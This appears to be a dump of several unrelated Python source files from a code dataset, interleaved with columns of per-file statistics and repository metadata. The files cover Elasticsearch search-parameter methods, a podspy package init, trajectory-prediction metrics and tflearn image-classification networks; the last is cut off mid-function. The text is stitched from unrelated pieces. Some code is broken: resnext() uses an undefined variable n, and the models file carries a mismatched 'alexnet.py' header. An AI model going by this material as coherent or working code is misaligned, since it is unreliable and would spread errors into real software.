:param value: ``Optional[str]``
Specifies the period of time to wait for a response in `time units
<https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units>`__.
If no response is received before the timeout expires, the request fails
and returns an error. Defaults to no timeout.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("timeout", value)
def track_scores(
self,
value: bool = False,
) -> Search:
"""
A search **query** parameter.
:param value: ``bool``
If ``true``, calculate and return document scores, even if the scores
are not used for sorting. Defaults to ``false``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("track_scores", value)
def track_total_hits(
self,
value: Union[int, bool] = 10000,
) -> Search:
"""
A search **query** parameter.
:param value: ``Union[int, bool]``
Number of hits matching the query to count accurately. Defaults to
``10000``.
If ``true``, the exact number of hits is returned at the cost of some
performance.
If ``false``, the response does not include the total number of hits
matching the query.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("track_total_hits", value)
def typed_keys(
self,
value: bool = True,
) -> Search:
"""
A search **query** parameter.
:param value: ``bool``
If ``true``, aggregation and suggester names are being prefixed by their
respective types in the response. Defaults to ``true``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("typed_keys", value)
def version(
self,
value: bool = False,
) -> Search:
"""
A search **query** parameter.
:param value: ``bool``
If ``true``, returns document version as part of a hit. Defaults to
``false``.
:returns: ``Search``
A new Search instance is created
"""
return self._set_parameter("version", value)
| 43.767113
| 2,081
| 0.597113
| 6,800
| 58,823
| 5.064706
| 0.073676
| 0.01565
| 0.021341
| 0.024187
| 0.849071
| 0.839634
| 0.818583
| 0.796748
| 0.790157
| 0.782259
| 0
| 0.002797
| 0.307125
| 58,823
| 1,343
| 2,082
| 43.799702
| 0.842211
| 0.643422
| 0
| 0.323899
| 1
| 0.003145
| 0.156106
| 0.024926
| 0
| 0
| 0
| 0
| 0
| 1
| 0.122642
| false
| 0.003145
| 0.012579
| 0
| 0.27044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
083c83d6a84931ff49682aca918677d46af3595d
| 158
|
py
|
Python
|
src/podspy/log/__init__.py
|
jwllee/podspy
|
a3ab176a83004069a27405acfc42838c135c555d
|
[
"MIT"
] | 1
|
2019-02-06T09:26:17.000Z
|
2019-02-06T09:26:17.000Z
|
src/podspy/log/__init__.py
|
wailamjonathanlee/podspy
|
a3ab176a83004069a27405acfc42838c135c555d
|
[
"MIT"
] | 12
|
2019-01-02T14:31:17.000Z
|
2019-01-22T18:24:03.000Z
|
src/podspy/log/__init__.py
|
wailamjonathanlee/podspy
|
a3ab176a83004069a27405acfc42838c135c555d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# loading modules into subpackage namespace
from podspy.log import data_io
from podspy.log import table
from podspy.log import factory
| 22.571429
| 43
| 0.810127
| 25
| 158
| 5.08
| 0.68
| 0.23622
| 0.307087
| 0.448819
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132911
| 158
| 6
| 44
| 26.333333
| 0.927007
| 0.392405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f2a59aae4451e93fd7addbfd62fb6d284caf688f
| 2,692
|
py
|
Python
|
evaluation/metrics.py
|
umautobots/osp
|
d055f1c846f907445186b9dea7da2d4dca4790a6
|
[
"MIT"
] | 1
|
2021-11-08T07:27:39.000Z
|
2021-11-08T07:27:39.000Z
|
evaluation/metrics.py
|
swb19/osp
|
d055f1c846f907445186b9dea7da2d4dca4790a6
|
[
"MIT"
] | null | null | null |
evaluation/metrics.py
|
swb19/osp
|
d055f1c846f907445186b9dea7da2d4dca4790a6
|
[
"MIT"
] | 2
|
2021-07-24T21:27:56.000Z
|
2021-10-31T14:13:20.000Z
|
import numpy as np
def get_expected_dist_by_time_fcns(select_inds=np.arange(9, 60, 10)):
init_fcn = lambda: []
def accumulate_fcn(accumulator, y_hats, p, y_true, **kwargs):
"""
:param accumulator: list of average distances from previous examples
list[i] = si, n_agents
:param y_hats: n_steps, n_agents, 2, n_samples
:param p: n_agents, n_samples | probabilities summing to 1
:param y_true: n_steps, n_agents, 2
:return:
"""
# si, n_agents, 2, n_samples
difs = y_hats[select_inds, ...] - np.expand_dims(y_true[select_inds, ...], -1)
dists = np.sqrt((difs ** 2).sum(axis=2)) # si, n_agents, n_samples
expected_dist = np.einsum('ijk,jk->ij', dists, p) # si, n_agents
accumulator.append(expected_dist)
def reduce_fcn(accumulator):
expected_dists = np.concatenate(accumulator, axis=1) # si, total agents
return expected_dists.mean(axis=1)
return init_fcn, accumulate_fcn, reduce_fcn
def get_rmse_by_time_fcns(select_inds=np.arange(9, 60, 10)):
init_fcn = lambda: []
def accumulate_fcn(accumulator, y_hats, p, y_true, **kwargs):
"""
:param accumulator: list of squared distances from previous examples
list[i] = si, n_agents
:param y_hats: n_steps, n_agents, 2, n_samples
:param p: n_agents, n_samples | probabilities summing to 1
:param y_true: n_steps, n_agents, 2
:return:
"""
# si, n_agents, 2, n_samples
difs = y_hats[select_inds, ...] - np.expand_dims(y_true[select_inds, ...], -1)
dists = (difs ** 2).sum(axis=2) # si, n_agents, n_samples
expected_dist = np.einsum('ijk,jk->ij', dists, p) # si, n_agents
accumulator.append(expected_dist)
def reduce_fcn(accumulator):
expected_dists = np.concatenate(accumulator, axis=1) # si, total agents
return np.sqrt(expected_dists.mean(axis=1))
return init_fcn, accumulate_fcn, reduce_fcn
def get_timing_fcns():
init_fcn = lambda: []
def accumulate_fcn(accumulator, y_hats, p, y_true, duration=np.nan, **kwargs):
"""
:param accumulator: list of (duration, n_agents)
:param y_hats: n_steps, n_agents, 2, n_samples
:param p: n_agents, n_samples | probabilities summing to 1
:param y_true: n_steps, n_agents, 2
:param duration: time taken
:return:
"""
accumulator.append((duration, y_true.shape[1]))
def reduce_fcn(accumulator):
duration_n_agents = np.array(accumulator)
return duration_n_agents[:, 0].mean()
return init_fcn, accumulate_fcn, reduce_fcn
| 38.457143
| 86
| 0.638559
| 383
| 2,692
| 4.227154
| 0.18799
| 0.086473
| 0.044472
| 0.048178
| 0.85176
| 0.834466
| 0.834466
| 0.812847
| 0.812847
| 0.812847
| 0
| 0.016248
| 0.245542
| 2,692
| 69
| 87
| 39.014493
| 0.780896
| 0.328752
| 0
| 0.612903
| 0
| 0
| 0.012422
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.290323
| false
| 0
| 0.032258
| 0
| 0.516129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
f2c22bcf5679d8e31efc5de8a95764715388340e
| 42,539
|
py
|
Python
|
v1/models.py
|
deva297/pyassetto
|
cfcf7562bd0da969995bde69983cd86ea52da3e7
|
[
"MIT"
] | null | null | null |
v1/models.py
|
deva297/pyassetto
|
cfcf7562bd0da969995bde69983cd86ea52da3e7
|
[
"MIT"
] | null | null | null |
v1/models.py
|
deva297/pyassetto
|
cfcf7562bd0da969995bde69983cd86ea52da3e7
|
[
"MIT"
] | null | null | null |
# alexnet.py
"""
Copyright 2015 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import tflearn
from tflearn.layers.conv import (
conv_2d,
max_pool_2d,
avg_pool_2d,
conv_3d,
max_pool_3d,
avg_pool_3d,
)
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
from tflearn.layers.normalization import local_response_normalization
from tflearn.layers.merge_ops import merge
def resnext(width, height, frame_count, lr, output=9, model_name="sentnet_color.model"):
net = input_data(shape=[None, width, height, 3], name="input")
net = tflearn.conv_2d(net, 16, 3, regularizer="L2", weight_decay=0.0001)
net = tflearn.layers.conv.resnext_block(net, n, 16, 32)
net = tflearn.resnext_block(net, 1, 32, 32, downsample=True)
net = tflearn.resnext_block(net, n - 1, 32, 32)
net = tflearn.resnext_block(net, 1, 64, 32, downsample=True)
net = tflearn.resnext_block(net, n - 1, 64, 32)
net = tflearn.batch_normalization(net)
net = tflearn.activation(net, "relu")
net = tflearn.global_avg_pool(net)
# Regression
net = tflearn.fully_connected(net, output, activation="softmax")
opt = tflearn.Momentum(0.1, lr_decay=0.1, decay_step=32000, staircase=True)
net = tflearn.regression(net, optimizer=opt, loss="categorical_crossentropy")
model = tflearn.DNN(
net, max_checkpoints=0, tensorboard_verbose=0, tensorboard_dir="log"
)
return model
def sentnet_color_2d(
width, height, frame_count, lr, output=9, model_name="sentnet_color.model"
):
network = input_data(shape=[None, width, height, 3], name="input")
network = conv_2d(network, 96, 11, strides=4, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = conv_2d(network, 256, 5, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 256, 3, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = conv_2d(network, 256, 5, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 256, 3, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, output, activation="softmax")
network = regression(
network,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network, max_checkpoints=0, tensorboard_verbose=0, tensorboard_dir="log"
)
return model
def inception_v3(
width, height, frame_count, lr, output=9, model_name="sentnet_color.model"
):
network = input_data(shape=[None, width, height, 3], name="input")
conv1_7_7 = conv_2d(
network, 64, 7, strides=2, activation="relu", name="conv1_7_7_s2"
)
pool1_3_3 = max_pool_2d(conv1_7_7, 3, strides=2)
pool1_3_3 = local_response_normalization(pool1_3_3)
conv2_3_3_reduce = conv_2d(
pool1_3_3, 64, 1, activation="relu", name="conv2_3_3_reduce"
)
conv2_3_3 = conv_2d(conv2_3_3_reduce, 192, 3, activation="relu", name="conv2_3_3")
conv2_3_3 = local_response_normalization(conv2_3_3)
pool2_3_3 = max_pool_2d(conv2_3_3, kernel_size=3, strides=2, name="pool2_3_3_s2")
inception_3a_1_1 = conv_2d(
pool2_3_3, 64, 1, activation="relu", name="inception_3a_1_1"
)
inception_3a_3_3_reduce = conv_2d(
pool2_3_3, 96, 1, activation="relu", name="inception_3a_3_3_reduce"
)
inception_3a_3_3 = conv_2d(
inception_3a_3_3_reduce,
128,
filter_size=3,
activation="relu",
name="inception_3a_3_3",
)
inception_3a_5_5_reduce = conv_2d(
pool2_3_3, 16, filter_size=1, activation="relu", name="inception_3a_5_5_reduce"
)
inception_3a_5_5 = conv_2d(
inception_3a_5_5_reduce,
32,
filter_size=5,
activation="relu",
name="inception_3a_5_5",
)
inception_3a_pool = max_pool_2d(
pool2_3_3,
kernel_size=3,
strides=1,
)
inception_3a_pool_1_1 = conv_2d(
inception_3a_pool,
32,
filter_size=1,
activation="relu",
name="inception_3a_pool_1_1",
)
# merge the inception_3a__
inception_3a_output = merge(
[inception_3a_1_1, inception_3a_3_3, inception_3a_5_5, inception_3a_pool_1_1],
mode="concat",
axis=3,
)
inception_3b_1_1 = conv_2d(
inception_3a_output,
128,
filter_size=1,
activation="relu",
name="inception_3b_1_1",
)
inception_3b_3_3_reduce = conv_2d(
inception_3a_output,
128,
filter_size=1,
activation="relu",
name="inception_3b_3_3_reduce",
)
inception_3b_3_3 = conv_2d(
inception_3b_3_3_reduce,
192,
filter_size=3,
activation="relu",
name="inception_3b_3_3",
)
inception_3b_5_5_reduce = conv_2d(
inception_3a_output,
32,
filter_size=1,
activation="relu",
name="inception_3b_5_5_reduce",
)
inception_3b_5_5 = conv_2d(
inception_3b_5_5_reduce, 96, filter_size=5, name="inception_3b_5_5"
)
inception_3b_pool = max_pool_2d(
inception_3a_output, kernel_size=3, strides=1, name="inception_3b_pool"
)
inception_3b_pool_1_1 = conv_2d(
inception_3b_pool,
64,
filter_size=1,
activation="relu",
name="inception_3b_pool_1_1",
)
# merge the inception_3b_*
inception_3b_output = merge(
[inception_3b_1_1, inception_3b_3_3, inception_3b_5_5, inception_3b_pool_1_1],
mode="concat",
axis=3,
name="inception_3b_output",
)
pool3_3_3 = max_pool_2d(
inception_3b_output, kernel_size=3, strides=2, name="pool3_3_3"
)
inception_4a_1_1 = conv_2d(
pool3_3_3, 192, filter_size=1, activation="relu", name="inception_4a_1_1"
)
inception_4a_3_3_reduce = conv_2d(
pool3_3_3, 96, filter_size=1, activation="relu", name="inception_4a_3_3_reduce"
)
inception_4a_3_3 = conv_2d(
inception_4a_3_3_reduce,
208,
filter_size=3,
activation="relu",
name="inception_4a_3_3",
)
inception_4a_5_5_reduce = conv_2d(
pool3_3_3, 16, filter_size=1, activation="relu", name="inception_4a_5_5_reduce"
)
inception_4a_5_5 = conv_2d(
inception_4a_5_5_reduce,
48,
filter_size=5,
activation="relu",
name="inception_4a_5_5",
)
inception_4a_pool = max_pool_2d(
pool3_3_3, kernel_size=3, strides=1, name="inception_4a_pool"
)
inception_4a_pool_1_1 = conv_2d(
inception_4a_pool,
64,
filter_size=1,
activation="relu",
name="inception_4a_pool_1_1",
)
inception_4a_output = merge(
[inception_4a_1_1, inception_4a_3_3, inception_4a_5_5, inception_4a_pool_1_1],
mode="concat",
axis=3,
name="inception_4a_output",
)
inception_4b_1_1 = conv_2d(
inception_4a_output,
160,
filter_size=1,
activation="relu",
name="inception_4a_1_1",
)
inception_4b_3_3_reduce = conv_2d(
inception_4a_output,
112,
filter_size=1,
activation="relu",
name="inception_4b_3_3_reduce",
)
inception_4b_3_3 = conv_2d(
inception_4b_3_3_reduce,
224,
filter_size=3,
activation="relu",
name="inception_4b_3_3",
)
inception_4b_5_5_reduce = conv_2d(
inception_4a_output,
24,
filter_size=1,
activation="relu",
name="inception_4b_5_5_reduce",
)
inception_4b_5_5 = conv_2d(
inception_4b_5_5_reduce,
64,
filter_size=5,
activation="relu",
name="inception_4b_5_5",
)
inception_4b_pool = max_pool_2d(
inception_4a_output, kernel_size=3, strides=1, name="inception_4b_pool"
)
inception_4b_pool_1_1 = conv_2d(
inception_4b_pool,
64,
filter_size=1,
activation="relu",
name="inception_4b_pool_1_1",
)
inception_4b_output = merge(
[inception_4b_1_1, inception_4b_3_3, inception_4b_5_5, inception_4b_pool_1_1],
mode="concat",
axis=3,
name="inception_4b_output",
)
inception_4c_1_1 = conv_2d(
inception_4b_output,
128,
filter_size=1,
activation="relu",
name="inception_4c_1_1",
)
inception_4c_3_3_reduce = conv_2d(
inception_4b_output,
128,
filter_size=1,
activation="relu",
name="inception_4c_3_3_reduce",
)
inception_4c_3_3 = conv_2d(
inception_4c_3_3_reduce,
256,
filter_size=3,
activation="relu",
name="inception_4c_3_3",
)
inception_4c_5_5_reduce = conv_2d(
inception_4b_output,
24,
filter_size=1,
activation="relu",
name="inception_4c_5_5_reduce",
)
inception_4c_5_5 = conv_2d(
inception_4c_5_5_reduce,
64,
filter_size=5,
activation="relu",
name="inception_4c_5_5",
)
inception_4c_pool = max_pool_2d(inception_4b_output, kernel_size=3, strides=1)
inception_4c_pool_1_1 = conv_2d(
inception_4c_pool,
64,
filter_size=1,
activation="relu",
name="inception_4c_pool_1_1",
)
inception_4c_output = merge(
[inception_4c_1_1, inception_4c_3_3, inception_4c_5_5, inception_4c_pool_1_1],
mode="concat",
axis=3,
name="inception_4c_output",
)
inception_4d_1_1 = conv_2d(
inception_4c_output,
112,
filter_size=1,
activation="relu",
name="inception_4d_1_1",
)
inception_4d_3_3_reduce = conv_2d(
inception_4c_output,
144,
filter_size=1,
activation="relu",
name="inception_4d_3_3_reduce",
)
inception_4d_3_3 = conv_2d(
inception_4d_3_3_reduce,
288,
filter_size=3,
activation="relu",
name="inception_4d_3_3",
)
inception_4d_5_5_reduce = conv_2d(
inception_4c_output,
32,
filter_size=1,
activation="relu",
name="inception_4d_5_5_reduce",
)
inception_4d_5_5 = conv_2d(
inception_4d_5_5_reduce,
64,
filter_size=5,
activation="relu",
name="inception_4d_5_5",
)
inception_4d_pool = max_pool_2d(
inception_4c_output, kernel_size=3, strides=1, name="inception_4d_pool"
)
inception_4d_pool_1_1 = conv_2d(
inception_4d_pool,
64,
filter_size=1,
activation="relu",
name="inception_4d_pool_1_1",
)
inception_4d_output = merge(
[inception_4d_1_1, inception_4d_3_3, inception_4d_5_5, inception_4d_pool_1_1],
mode="concat",
axis=3,
name="inception_4d_output",
)
inception_4e_1_1 = conv_2d(
inception_4d_output,
256,
filter_size=1,
activation="relu",
name="inception_4e_1_1",
)
inception_4e_3_3_reduce = conv_2d(
inception_4d_output,
160,
filter_size=1,
activation="relu",
name="inception_4e_3_3_reduce",
)
inception_4e_3_3 = conv_2d(
inception_4e_3_3_reduce,
320,
filter_size=3,
activation="relu",
name="inception_4e_3_3",
)
inception_4e_5_5_reduce = conv_2d(
inception_4d_output,
32,
filter_size=1,
activation="relu",
name="inception_4e_5_5_reduce",
)
inception_4e_5_5 = conv_2d(
inception_4e_5_5_reduce,
128,
filter_size=5,
activation="relu",
name="inception_4e_5_5",
)
inception_4e_pool = max_pool_2d(
inception_4d_output, kernel_size=3, strides=1, name="inception_4e_pool"
)
inception_4e_pool_1_1 = conv_2d(
inception_4e_pool,
128,
filter_size=1,
activation="relu",
name="inception_4e_pool_1_1",
)
inception_4e_output = merge(
[inception_4e_1_1, inception_4e_3_3, inception_4e_5_5, inception_4e_pool_1_1],
axis=3,
mode="concat",
)
pool4_3_3 = max_pool_2d(
inception_4e_output, kernel_size=3, strides=2, name="pool_3_3"
)
inception_5a_1_1 = conv_2d(
pool4_3_3, 256, filter_size=1, activation="relu", name="inception_5a_1_1"
)
inception_5a_3_3_reduce = conv_2d(
pool4_3_3, 160, filter_size=1, activation="relu", name="inception_5a_3_3_reduce"
)
inception_5a_3_3 = conv_2d(
inception_5a_3_3_reduce,
320,
filter_size=3,
activation="relu",
name="inception_5a_3_3",
)
inception_5a_5_5_reduce = conv_2d(
pool4_3_3, 32, filter_size=1, activation="relu", name="inception_5a_5_5_reduce"
)
inception_5a_5_5 = conv_2d(
inception_5a_5_5_reduce,
128,
filter_size=5,
activation="relu",
name="inception_5a_5_5",
)
inception_5a_pool = max_pool_2d(
pool4_3_3, kernel_size=3, strides=1, name="inception_5a_pool"
)
inception_5a_pool_1_1 = conv_2d(
inception_5a_pool,
128,
filter_size=1,
activation="relu",
name="inception_5a_pool_1_1",
)
inception_5a_output = merge(
[inception_5a_1_1, inception_5a_3_3, inception_5a_5_5, inception_5a_pool_1_1],
axis=3,
mode="concat",
)
inception_5b_1_1 = conv_2d(
inception_5a_output,
384,
filter_size=1,
activation="relu",
name="inception_5b_1_1",
)
inception_5b_3_3_reduce = conv_2d(
inception_5a_output,
192,
filter_size=1,
activation="relu",
name="inception_5b_3_3_reduce",
)
inception_5b_3_3 = conv_2d(
inception_5b_3_3_reduce,
384,
filter_size=3,
activation="relu",
name="inception_5b_3_3",
)
inception_5b_5_5_reduce = conv_2d(
inception_5a_output,
48,
filter_size=1,
activation="relu",
name="inception_5b_5_5_reduce",
)
inception_5b_5_5 = conv_2d(
inception_5b_5_5_reduce,
128,
filter_size=5,
activation="relu",
name="inception_5b_5_5",
)
inception_5b_pool = max_pool_2d(
inception_5a_output, kernel_size=3, strides=1, name="inception_5b_pool"
)
inception_5b_pool_1_1 = conv_2d(
inception_5b_pool,
128,
filter_size=1,
activation="relu",
name="inception_5b_pool_1_1",
)
inception_5b_output = merge(
[inception_5b_1_1, inception_5b_3_3, inception_5b_5_5, inception_5b_pool_1_1],
axis=3,
mode="concat",
)
pool5_7_7 = avg_pool_2d(inception_5b_output, kernel_size=7, strides=1)
pool5_7_7 = dropout(pool5_7_7, 0.4)
loss = fully_connected(pool5_7_7, output, activation="softmax")
network = regression(
loss,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network, max_checkpoints=0, tensorboard_verbose=0, tensorboard_dir="log"
)
return model
def inception_v3_3d(
width, height, frame_count, lr, output=9, model_name="sentnet_color.model"
):
network = input_data(shape=[None, width, height, 3, 1], name="input")
conv1_7_7 = conv_3d(
network, 64, 7, strides=2, activation="relu", name="conv1_7_7_s2"
)
pool1_3_3 = max_pool_3d(conv1_7_7, 3, strides=2)
# pool1_3_3 = local_response_normalization(pool1_3_3)
conv2_3_3_reduce = conv_3d(
pool1_3_3, 64, 1, activation="relu", name="conv2_3_3_reduce"
)
conv2_3_3 = conv_3d(conv2_3_3_reduce, 192, 3, activation="relu", name="conv2_3_3")
# conv2_3_3 = local_response_normalization(conv2_3_3)
pool2_3_3 = max_pool_3d(conv2_3_3, kernel_size=3, strides=2, name="pool2_3_3_s2")
inception_3a_1_1 = conv_3d(
pool2_3_3, 64, 1, activation="relu", name="inception_3a_1_1"
)
inception_3a_3_3_reduce = conv_3d(
pool2_3_3, 96, 1, activation="relu", name="inception_3a_3_3_reduce"
)
inception_3a_3_3 = conv_3d(
inception_3a_3_3_reduce,
128,
filter_size=3,
activation="relu",
name="inception_3a_3_3",
)
inception_3a_5_5_reduce = conv_3d(
pool2_3_3, 16, filter_size=1, activation="relu", name="inception_3a_5_5_reduce"
)
inception_3a_5_5 = conv_3d(
inception_3a_5_5_reduce,
32,
filter_size=5,
activation="relu",
name="inception_3a_5_5",
)
inception_3a_pool = max_pool_3d(
pool2_3_3,
kernel_size=3,
strides=1,
)
inception_3a_pool_1_1 = conv_3d(
inception_3a_pool,
32,
filter_size=1,
activation="relu",
name="inception_3a_pool_1_1",
)
# merge the inception_3a__
inception_3a_output = merge(
[inception_3a_1_1, inception_3a_3_3, inception_3a_5_5, inception_3a_pool_1_1],
mode="concat",
axis=4,
)
inception_3b_1_1 = conv_3d(
inception_3a_output,
128,
filter_size=1,
activation="relu",
name="inception_3b_1_1",
)
inception_3b_3_3_reduce = conv_3d(
inception_3a_output,
128,
filter_size=1,
activation="relu",
name="inception_3b_3_3_reduce",
)
inception_3b_3_3 = conv_3d(
inception_3b_3_3_reduce,
192,
filter_size=3,
activation="relu",
name="inception_3b_3_3",
)
inception_3b_5_5_reduce = conv_3d(
inception_3a_output,
32,
filter_size=1,
activation="relu",
name="inception_3b_5_5_reduce",
)
inception_3b_5_5 = conv_3d(
inception_3b_5_5_reduce, 96, filter_size=5, name="inception_3b_5_5"
)
inception_3b_pool = max_pool_3d(
inception_3a_output, kernel_size=3, strides=1, name="inception_3b_pool"
)
inception_3b_pool_1_1 = conv_3d(
inception_3b_pool,
64,
filter_size=1,
activation="relu",
name="inception_3b_pool_1_1",
)
# merge the inception_3b_*
inception_3b_output = merge(
[inception_3b_1_1, inception_3b_3_3, inception_3b_5_5, inception_3b_pool_1_1],
mode="concat",
axis=4,
name="inception_3b_output",
)
pool3_3_3 = max_pool_3d(
inception_3b_output, kernel_size=3, strides=2, name="pool3_3_3"
)
inception_4a_1_1 = conv_3d(
pool3_3_3, 192, filter_size=1, activation="relu", name="inception_4a_1_1"
)
inception_4a_3_3_reduce = conv_3d(
pool3_3_3, 96, filter_size=1, activation="relu", name="inception_4a_3_3_reduce"
)
inception_4a_3_3 = conv_3d(
inception_4a_3_3_reduce,
208,
filter_size=3,
activation="relu",
name="inception_4a_3_3",
)
inception_4a_5_5_reduce = conv_3d(
pool3_3_3, 16, filter_size=1, activation="relu", name="inception_4a_5_5_reduce"
)
inception_4a_5_5 = conv_3d(
inception_4a_5_5_reduce,
48,
filter_size=5,
activation="relu",
name="inception_4a_5_5",
)
inception_4a_pool = max_pool_3d(
pool3_3_3, kernel_size=3, strides=1, name="inception_4a_pool"
)
inception_4a_pool_1_1 = conv_3d(
inception_4a_pool,
64,
filter_size=1,
activation="relu",
name="inception_4a_pool_1_1",
)
inception_4a_output = merge(
[inception_4a_1_1, inception_4a_3_3, inception_4a_5_5, inception_4a_pool_1_1],
mode="concat",
axis=4,
name="inception_4a_output",
)
inception_4b_1_1 = conv_3d(
inception_4a_output,
160,
filter_size=1,
activation="relu",
name="inception_4a_1_1",
)
inception_4b_3_3_reduce = conv_3d(
inception_4a_output,
112,
filter_size=1,
activation="relu",
name="inception_4b_3_3_reduce",
)
inception_4b_3_3 = conv_3d(
inception_4b_3_3_reduce,
224,
filter_size=3,
activation="relu",
name="inception_4b_3_3",
)
inception_4b_5_5_reduce = conv_3d(
inception_4a_output,
24,
filter_size=1,
activation="relu",
name="inception_4b_5_5_reduce",
)
inception_4b_5_5 = conv_3d(
inception_4b_5_5_reduce,
64,
filter_size=5,
activation="relu",
name="inception_4b_5_5",
)
inception_4b_pool = max_pool_3d(
inception_4a_output, kernel_size=3, strides=1, name="inception_4b_pool"
)
inception_4b_pool_1_1 = conv_3d(
inception_4b_pool,
64,
filter_size=1,
activation="relu",
name="inception_4b_pool_1_1",
)
inception_4b_output = merge(
[inception_4b_1_1, inception_4b_3_3, inception_4b_5_5, inception_4b_pool_1_1],
mode="concat",
axis=4,
name="inception_4b_output",
)
inception_4c_1_1 = conv_3d(
inception_4b_output,
128,
filter_size=1,
activation="relu",
name="inception_4c_1_1",
)
inception_4c_3_3_reduce = conv_3d(
inception_4b_output,
128,
filter_size=1,
activation="relu",
name="inception_4c_3_3_reduce",
)
inception_4c_3_3 = conv_3d(
inception_4c_3_3_reduce,
256,
filter_size=3,
activation="relu",
name="inception_4c_3_3",
)
inception_4c_5_5_reduce = conv_3d(
inception_4b_output,
24,
filter_size=1,
activation="relu",
name="inception_4c_5_5_reduce",
)
inception_4c_5_5 = conv_3d(
inception_4c_5_5_reduce,
64,
filter_size=5,
activation="relu",
name="inception_4c_5_5",
)
inception_4c_pool = max_pool_3d(inception_4b_output, kernel_size=3, strides=1)
inception_4c_pool_1_1 = conv_3d(
inception_4c_pool,
64,
filter_size=1,
activation="relu",
name="inception_4c_pool_1_1",
)
inception_4c_output = merge(
[inception_4c_1_1, inception_4c_3_3, inception_4c_5_5, inception_4c_pool_1_1],
mode="concat",
axis=4,
name="inception_4c_output",
)
inception_4d_1_1 = conv_3d(
inception_4c_output,
112,
filter_size=1,
activation="relu",
name="inception_4d_1_1",
)
inception_4d_3_3_reduce = conv_3d(
inception_4c_output,
144,
filter_size=1,
activation="relu",
name="inception_4d_3_3_reduce",
)
inception_4d_3_3 = conv_3d(
inception_4d_3_3_reduce,
288,
filter_size=3,
activation="relu",
name="inception_4d_3_3",
)
inception_4d_5_5_reduce = conv_3d(
inception_4c_output,
32,
filter_size=1,
activation="relu",
name="inception_4d_5_5_reduce",
)
inception_4d_5_5 = conv_3d(
inception_4d_5_5_reduce,
64,
filter_size=5,
activation="relu",
name="inception_4d_5_5",
)
inception_4d_pool = max_pool_3d(
inception_4c_output, kernel_size=3, strides=1, name="inception_4d_pool"
)
inception_4d_pool_1_1 = conv_3d(
inception_4d_pool,
64,
filter_size=1,
activation="relu",
name="inception_4d_pool_1_1",
)
inception_4d_output = merge(
[inception_4d_1_1, inception_4d_3_3, inception_4d_5_5, inception_4d_pool_1_1],
mode="concat",
axis=4,
name="inception_4d_output",
)
inception_4e_1_1 = conv_3d(
inception_4d_output,
256,
filter_size=1,
activation="relu",
name="inception_4e_1_1",
)
inception_4e_3_3_reduce = conv_3d(
inception_4d_output,
160,
filter_size=1,
activation="relu",
name="inception_4e_3_3_reduce",
)
inception_4e_3_3 = conv_3d(
inception_4e_3_3_reduce,
320,
filter_size=3,
activation="relu",
name="inception_4e_3_3",
)
inception_4e_5_5_reduce = conv_3d(
inception_4d_output,
32,
filter_size=1,
activation="relu",
name="inception_4e_5_5_reduce",
)
inception_4e_5_5 = conv_3d(
inception_4e_5_5_reduce,
128,
filter_size=5,
activation="relu",
name="inception_4e_5_5",
)
inception_4e_pool = max_pool_3d(
inception_4d_output, kernel_size=3, strides=1, name="inception_4e_pool"
)
inception_4e_pool_1_1 = conv_3d(
inception_4e_pool,
128,
filter_size=1,
activation="relu",
name="inception_4e_pool_1_1",
)
inception_4e_output = merge(
[inception_4e_1_1, inception_4e_3_3, inception_4e_5_5, inception_4e_pool_1_1],
axis=4,
mode="concat",
)
pool4_3_3 = max_pool_3d(
inception_4e_output, kernel_size=3, strides=2, name="pool_3_3"
)
inception_5a_1_1 = conv_3d(
